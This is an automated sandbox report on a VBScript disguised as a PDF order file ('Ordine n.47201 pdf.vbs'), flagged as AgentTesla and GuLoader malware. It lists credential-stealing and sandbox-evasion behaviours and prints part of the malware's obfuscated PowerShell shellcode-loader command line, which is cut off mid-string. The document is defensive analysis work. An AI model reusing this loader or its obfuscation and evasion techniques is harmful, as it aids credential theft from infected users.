Edit tour
Windows
Analysis Report
Ordine n.47201 pdf.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 5812 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Ordin e n.47201 pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - cmd.exe (PID: 5780 cmdline:
CMD.EXE /c echo C:\W indows MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5864 cmdline:
C:\Windows \syswow64\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Skoleekse mpel = """ SmADrdZodS y-CoTblySa pCeeCh Lo- UnTOryHapU deFoDMaeSy fCaiMhnNai PhtPriFoop enpe Uf'te uResBliHen SmgGe TaSS kyOpsQutUe eanmBo;Bau DosFriAlnO rgJe KaSFj yMisSptVme Drmra.CoRB auTunVatwa ipamSaeTr. viIManUntG ieOmrBaoHu phySGoeImr ApvTriOmcC leOvsNa;Po pAfuChbKul DuiMocDo D asLetAnaBu tLyipocJo ArcfelUnaA msHesNo Di SudtNouSpe InoBurScgR elAseElrOv sAx1Re Ti{ Pr[suDWhlF olFeIRimUn pAzoSurPat st(En`"""A swOpimanIn sAspCaonoo FolSg.RedN grEkvRe`"" "Po)Ho]Frp TruEmbSelZ eiChcDj Bi sKatGlaPrt ImiGecHe P aeObxFotRe eMirBrnca LiiAcnSute l EnPDerEf iFonBatMae FirAfMSceC osTesAdaDi gHeeMiBPeo ApxVa(MeiS unRetBa Sk SHytOpaHeb RrlSt,asiB unBatSc Sy dSneAdlDea UngoptFo,P riBinBitRo SkCunrPuo Bl,LaiTunH ytLa NoRFr iBevReuVal Un,RaiRonC atEt EpTMa rFroBapKei EfcBa,Seir unMotLl Co SVakSeiBot FosReecr)B i;Cy[rtDMu lBalAtILim LapFeoRerI mtIn(Ra`"" "KlAUnDEuV LeAAcPBaIA f3Fr2Pa.Co DAnLHaLLg` """Tu)Sp]R epGruJubMu lStiOscoc masFatReaU ntRaiStcKn ReePrxPit deeBerEnnS i AniGanSg tAa snRIne BrgErQGouB aeOlrfryTr IDenClfCho EnKWieTryS t(MaiStnFl tMi NoPSpo DutAdtTeeH ynsu,PriPr nsatFr OrT SkeSolUneR eoArlDe,Ak iInnBetfo CoPRelSauM erUn,LeiUn nLatFl dyF SyuFisEfiI moStnAt,Ou iIonCuthe AasBeaIllW a,BaiPonAn tRk KoSGia UnuUn,NyiG inSrtBo St kLoasnlRek en,GriArnm etDi HyWta eTaeAf,Odi EmnFltIr N uGAboHedGi kKo,SiiTon BrtIm MeSo vyMonHaaBi nRo,VeiRen AatCa BrPA geByaSj,Va iHanPhtgo NiBBriNorG akPl)Sa;Su [anDRelRal MoISemHopY ooPerSntVi (Re`"""Dik WieVorPrnK oesmlQu3Gl 2Os`"""Un) Sl]bopInuG abKalAmiFl cFu RnsFet StaPrtAsiC ecOv BreZo xswtSteRer AmnOp StiH anCytPh Te DRauDrpRel SoiHocKnaM utAneMuHIr aAmnFodMil LeeSi(RoiS pnBatOp Sp HMijGaeun, UniGunQutT r CrMLoeAk eAvtEsiBen Fl,ReiMonA mtur HoUGo nUnoUnrSj, dyiRanTitF l KaemoxBe aGecPr,Ddi PhnEktTu B aOMavPieBr rBi,DiiTin MitRc UdBF aiDyoOumSy epecDi,Mii BunXitOp O nSMiihulPa uSk)Pr;Kr[ ThDBalAflB aIInmFopDe oRorOptUn( Rh`"""mokF oeSprPrnEx eAmlAd3He2 Op`"""Ld)U n]FepAbuFe bSklDeiInc Sn AfsNetK eaEqtSaiSu cSt SaeGrx datAneIrrR enAm NeiPe nDitdo FoV feiWorBltC euOpaFllAn AInlBilUao SucEl(MoiS unFatNo Pr vDe1Ba,Fdi TrnuntFo F ivAl2Tr,We iSpnSttKa CovFo3Fo,O siGanWitRe SavBe4Ca) Vi;Ou[KaDP alKrlfiIAn mScpVioXyr TitMe(ax`" ""MauMesWi eTarEk3Di2 Kr`"""Fa)N e]CapLeuWo bMalYdiInc An BosExtG raFrtCiiCo cEt OpeVax EntZueGnrK ande AliTi nMaton UsG feeNetVePO vrKloThpAl (CoiFinFat Br UrEdegE nyTo,naiTi nBatLs LeS BehNeati)A s;Ma[SiDPl lNelDuICam vapSgoShrW atTy(Te`"" "UnuJosDee CarCo3Sy2g u`"""Fi)Ur ]SkpStuAnb HylHeiLycA g SmsMitSu aTitOdiVac li BoeRwxT rtSkeVerUn nNo hyiMon LitEu blCT hrOveBraIn tFleTjCTiu OprAtsTroI orPr(FoiDe nTitEf glM IseUnlUnlF y,Geitanso